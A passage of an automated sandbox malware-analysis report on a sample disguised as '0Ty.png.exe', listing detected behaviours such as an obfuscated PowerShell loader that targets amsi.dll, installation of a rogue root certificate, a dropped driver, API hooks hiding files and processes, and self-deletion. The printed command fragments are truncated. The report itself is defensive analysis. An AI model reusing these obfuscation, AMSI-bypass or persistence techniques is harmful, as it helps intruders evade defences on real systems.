            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: 0Ty.png.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: 0Ty.png.exeStatic file information: File size 5457920 > 1048576
            Source: 0Ty.png.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x526e00
            Source: 0Ty.png.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($GwiYeAsQvQLFBf,$JUWLrRiAryQvoCLvYRG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$GgrwIxrHHM
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($gtTuUeciWixJxL,$PODdpwJbLVAeqmqHxFL).Invoke(''+[Char](97)+''+[Char](109)+'si'+'.'+''+[Char](100)+'ll');$DyCMYouZARyvvTbwm=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$DBzwtCM
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l
            Obfuscated command line found
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char]
            Suspicious powershell command line found
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char]
            Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_0000000140832D30
            Source: 0Ty.png.exeStatic PE information: section name: .00cfg
            Source: weiuemyrzjra.exe.0.drStatic PE information: section name: .00cfg
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_000002408995B0ED push rcx; retf 003Fh31_3_000002408995B0EE
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AB05C push esp; retf 66_2_00007FFD9B8AB05D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8A63D1 push ebx; retf 0009h66_2_00007FFD9B8A641A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9BB2231A push 8B485F77h; iretd 66_2_00007FFD9BB22322
            Source: C:\Windows\System32\conhost.exeCode function: 67_3_0000014ECB48B0ED push rcx; retf 003Fh67_3_0000014ECB48B0EE
            Source: C:\Windows\System32\winlogon.exeCode function: 69_3_00000225DC62B0ED push rcx; retf 003Fh69_3_00000225DC62B0EE
            Source: C:\Windows\System32\lsass.exeCode function: 70_3_00000202C0ACB0ED push rcx; retf 003Fh70_3_00000202C0ACB0EE
            Source: C:\Windows\System32\svchost.exeCode function: 71_3_000002A6612EB0ED push rcx; retf 003Fh71_3_000002A6612EB0EE
            Source: C:\Windows\System32\dwm.exeCode function: 72_3_000002BAAEDEB0ED push rcx; retf 003Fh72_3_000002BAAEDEB0EE
            Source: C:\Windows\System32\dllhost.exeCode function: 73_3_00000248FFB5B0ED push rcx; retf 003Fh73_3_00000248FFB5B0EE

            Persistence and Installation Behavior

            barindex
            Installs new ROOT certificates
            Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Sample is not signed and drops a device driver
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeFile created: C:\Windows\TEMP\ihddniqxcjeb.sysJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeFile created: C:\Windows\Temp\ihddniqxcjeb.sysJump to dropped file
            Source: C:\Users\user\Desktop\0Ty.png.exeFile created: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeJump to dropped file
            Source: C:\Users\user\Desktop\0Ty.png.exeFile created: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeJump to dropped file
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeFile created: C:\Windows\Temp\ihddniqxcjeb.sysJump to dropped file
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hooks files or directories query functions (used to hide files and directories)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Hooks processes query functions (used to hide processes)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
            Self deletion via cmd or bat file
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"Jump to behavior
            Uses an obfuscated file name to hide its real file extension (double extension)
            Source: Possible double extension: png.exeStatic PE information: 0Ty.png.exe
            Source: C:\Windows\System32\dialer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE dialerstagerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
